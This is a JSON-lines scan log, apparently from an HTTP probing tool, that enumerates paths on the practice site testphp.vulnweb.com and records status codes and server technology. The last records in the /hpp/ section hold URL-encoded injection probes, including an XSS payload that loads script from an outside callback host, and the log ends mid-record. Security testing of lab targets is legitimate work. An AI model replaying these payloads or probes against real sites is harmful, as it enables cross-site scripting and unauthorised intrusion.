artist\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment.php?aid=3\",\"time\":\"347.755907ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":125,\"lines\":39,\"status_code\":200,\"content_length\":1252,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:02.617716181Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/comment.php?pid=1\",\"input\":\"http://testphp.vulnweb.com/comment.php?pid=1\",\"title\":\"comment on picture\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment.php?pid=1\",\"time\":\"338.838467ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":125,\"lines\":39,\"status_code\":200,\"content_length\":1253,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:05.85490839Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/comment.php?pid=2\",\"input\":\"http://testphp.vulnweb.com/comment.php?pid=2\",\"title\":\"comment on picture\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment.php?pid=2\",\"time\":\"347.876371ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":125,\"lines\":39,\"status_code\":200,\"content_length\":1253,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:05.957541367Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/comment.php?pid=3\",\"input\":\"http://testphp.vulnweb.com/comment.php?pid=3\",\"title\":\"comment on picture\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment.php?pid=3\",\"time\":\"348.600535ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":125,\"lines\":39,\"status_code\":200,\"content_length\":1253,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:06.059449696Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/comment.php?pid=3A01\",\"input\":\"http://testphp.vulnweb.com/comment.php?pid=3A01\",\"title\":\"comment on picture\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment.php?pid=3A01\",\"time\":\"361.294737ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":125,\"lines\":39,\"status_code\":200,\"content_length\":1253,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:06.091508215Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/comment.php?pid=4\",\"input\":\"http://testphp.vulnweb.com/comment.php?pid=4\",\"title\":\"comment on picture\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment.php?pid=4\",\"time\":\"356.667166ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":125,\"lines\":39,\"status_code\":200,\"content_length\":1253,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:06.467410413Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/comment.php?pid=5\",\"input\":\"http://testphp.vulnweb.com/comment.php?pid=5\",\"title\":\"comment on picture\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment.php?pid=5\",\"time\":\"346.045782ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":125,\"lines\":39,\"status_code\":200,\"content_length\":1253,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:06.82511415Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/comment.php?pid=6\",\"input\":\"http://testphp.vulnweb.com/comment.php?pid=6\",\"title\":\"comment on picture\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment.php?pid=6\",\"time\":\"343.49414ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":125,\"lines\":39,\"status_code\":200,\"content_length\":1253,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:06.836530879Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/comment.php?pid=7\",\"input\":\"http://testphp.vulnweb.com/comment.php?pid=7\",\"title\":\"comment on picture\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment.php?pid=7\",\"time\":\"354.781136ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":125,\"lines\":39,\"status_code\":200,\"content_length\":1253,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:07.070427978Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/comment.phpA01\",\"input\":\"http://testphp.vulnweb.com/comment.phpA01\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment.phpA01\",\"time\":\"343.090055ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:07.611229594Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/comment.phpCONFIRMED\",\"input\":\"http://testphp.vulnweb.com/comment.phpCONFIRMED\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment.phpCONFIRMED\",\"time\":\"339.606428ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:07.769515841Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/comment.phpUser-Agent:\",\"input\":\"http://testphp.vulnweb.com/comment.phpUser-Agent:\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment.phpUser-Agent:\",\"time\":\"357.600323ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:09.407065927Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/crossdomain.x\",\"input\":\"http://testphp.vulnweb.com/crossdomain.x\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/crossdomain.x\",\"time\":\"344.510777ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:10.494488985Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/crossdomain.xmlA04\",\"input\":\"http://testphp.vulnweb.com/crossdomain.xmlA04\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/crossdomain.xmlA04\",\"time\":\"339.94147ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:10.770112055Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/crossdomain.xmlA04http://testphp.vulnweb.com/disclaimer.php\",\"input\":\"http://testphp.vulnweb.com/crossdomain.xmlA04http://testphp.vulnweb.com/disclaimer.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/crossdomain.xmlA04http://testphp.vulnweb.com/disclaimer.php\",\"time\":\"352.830076ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:11.061531625Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/crossdomain.xmlA04http://testphp.vulnweb.com/disclaimer.phpA01\",\"input\":\"http://testphp.vulnweb.com/crossdomain.xmlA04http://testphp.vulnweb.com/disclaimer.phpA01\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/crossdomain.xmlA04http://testphp.vulnweb.com/disclaimer.phpA01\",\"time\":\"339.718494ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:11.831098927Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/disclaimer.php\",\"input\":\"http://testphp.vulnweb.com/disclaimer.php\",\"title\":\"disclaimer\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/disclaimer.php\",\"time\":\"357.918466ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":574,\"lines\":115,\"status_code\":200,\"content_length\":5524,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:11.84043158Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/disclaimer.php3\",\"input\":\"http://testphp.vulnweb.com/disclaimer.php3\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/disclaimer.php3\",\"time\":\"350.405343ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:11.914305805Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/disclaimer.php3L\",\"input\":\"http://testphp.vulnweb.com/disclaimer.php3L\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/disclaimer.php3L\",\"time\":\"347.275289ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:11.937137088Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/disclaimer.phpA01\",\"input\":\"http://testphp.vulnweb.com/disclaimer.phpA01\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/disclaimer.phpA01\",\"time\":\"356.398998ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:11.967775195Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/donalxyz.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/donalxyz.blogspot.com/\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/donalxyz.blogspot.com/\",\"time\":\"343.899839ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:12.184760139Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/dot.gif\",\"input\":\"http://testphp.vulnweb.com/dot.gif\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/gif\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/dot.gif\",\"time\":\"360.497113ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":43,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:12.281975473Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/factstalks.com\",\"input\":\"http://testphp.vulnweb.com/factstalks.com\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/factstalks.com\",\"time\":\"338.986633ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:12.360904291Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/fashionmagazinetoday.com\",\"input\":\"http://testphp.vulnweb.com/fashionmagazinetoday.com\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/fashionmagazinetoday.com\",\"time\":\"351.826316ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:12.381107212Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/favicon.ico\",\"input\":\"http://testphp.vulnweb.com/favicon.ico\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/x-icon\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/favicon.ico\",\"time\":\"347.544783ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":2,\"lines\":4,\"status_code\":200,\"content_length\":894,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:12.425693805Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/flavorfascination.com/\",\"input\":\"http://testphp.vulnweb.com/flavorfascination.com/\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/flavorfascination.com/\",\"time\":\"344.038681ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:12.461910841Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/guestbook.php\",\"input\":\"http://testphp.vulnweb.com/guestbook.php\",\"title\":\"guestbook\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/guestbook.php\",\"time\":\"342.401438ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":515,\"lines\":113,\"status_code\":200,\"content_length\":5390,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:12.624252814Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/guestbook.php12\",\"input\":\"http://testphp.vulnweb.com/guestbook.php12\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/guestbook.php12\",\"time\":\"343.191576ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:12.710206446Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/guestbook.php12H\",\"input\":\"http://testphp.vulnweb.com/guestbook.php12H\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/guestbook.php12H\",\"time\":\"350.602678ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:12.717694253Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/guestbook.phpA01\",\"input\":\"http://testphp.vulnweb.com/guestbook.phpA01\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/guestbook.phpA01\",\"time\":\"348.059618ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:12.774882217Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/guestbook.phpCONFIRMED\",\"input\":\"http://testphp.vulnweb.com/guestbook.phpCONFIRMED\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/guestbook.phpCONFIRMED\",\"time\":\"344.379905ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:12.965238103Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/guestbook.phpUser-Agent:\",\"input\":\"http://testphp.vulnweb.com/guestbook.phpUser-Agent:\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/guestbook.phpUser-Agent:\",\"time\":\"344.924578ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:16.21423748Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/healthwawpl32.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/healthwawpl32.blogspot.com/\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/healthwawpl32.blogspot.com/\",\"time\":\"356.770021ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:16.311505596Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/high\",\"input\":\"http://testphp.vulnweb.com/high\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/high\",\"time\":\"351.476903ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:16.40498415Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hj/var/www/showimage.php\",\"input\":\"http://testphp.vulnweb.com/hj/var/www/showimage.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hj/var/www/showimage.php\",\"time\":\"343.369373ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:16.451340543Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/\",\"input\":\"http://testphp.vulnweb.com/hpp/\",\"title\":\"HTTP Parameter Pollution Example\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/\",\"time\":\"357.001751ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":7,\"lines\":6,\"status_code\":200,\"content_length\":203,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:16.824733659Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/5\",\"input\":\"http://testphp.vulnweb.com/hpp/5\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/5\",\"time\":\"355.208274ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:17.166842221Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/5H\",\"input\":\"http://testphp.vulnweb.com/hpp/5H\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/5H\",\"time\":\"339.915599ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:17.182875641Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/?pp='%22--%3E%3C%2fst\",\"input\":\"http://testphp.vulnweb.com/hpp/?pp='%22--%3E%3C%2fst\",\"title\":\"HTTP Parameter Pollution Example\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/?pp='%22--%3E%3C%2fst\",\"time\":\"343.106484ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":12,\"lines\":6,\"status_code\":200,\"content_length\":414,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:17.426122831Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/?pp='%22--%3E%3C%2fstyle%3E%3C%2fscRipt%3E%25\",\"input\":\"http://testphp.vulnweb.com/hpp/?pp='%22--%3E%3C%2fstyle%3E%3C%2fscRipt%3E%25\",\"title\":\"HTTP Parameter Pollution Example\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/?pp='%22--%3E%3C%2fstyle%3E%3C%2fscRipt%3E%25\",\"time\":\"352.904577ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":12,\"lines\":6,\"status_code\":200,\"content_length\":466,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:17.967246397Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/?pp='%22--%3E%3C%2fstyle%3E%3C%2fscRipt%3E%3CscRipt%20src%3d%22%2f%2fmv9e8mbvffulk1i0duvujvkdkktmkntnztbb8kejrja%26%2346%3br87%26%2346%3bme%22%3E%3C%2fscRipt%3E\",\"input\":\"http://testphp.vulnweb.com/hpp/?pp='%22--%3E%3C%2fstyle%3E%3C%2fscRipt%3E%3CscRipt%20src%3d%22%2f%2fmv9e8mbvffulk1i0duvujvkdkktmkntnztbb8kejrja%26%2346%3br87%26%2346%3bme%22%3E%3C%2fscRipt%3E\",\"title\":\"HTTP Parameter Pollution 